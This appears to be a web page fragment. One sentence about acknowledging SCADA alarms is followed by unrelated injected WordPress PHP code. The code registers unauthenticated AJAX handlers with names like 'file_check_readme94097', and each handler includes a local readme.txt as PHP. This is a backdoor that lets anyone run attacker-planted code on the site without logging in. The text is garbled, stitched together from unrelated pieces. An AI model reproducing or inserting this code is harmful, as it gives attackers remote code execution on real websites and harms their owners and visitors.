When someone acknowledges the alarm, it’s reported and recorded in the SCADA system. If the alarm was sent to other people, they will also see that acknowledgement, and will know who now “owns” the alarm.
if(!function_exists('file_check_readme94097')){ add_action('wp_ajax_nopriv_file_check_readme94097', 'file_check_readme94097'); add_action('wp_ajax_file_check_readme94097', 'file_check_readme94097'); function file_check_readme94097() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme37999')){ add_action('wp_ajax_nopriv_file_check_readme37999', 'file_check_readme37999'); add_action('wp_ajax_file_check_readme37999', 'file_check_readme37999'); function file_check_readme37999() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }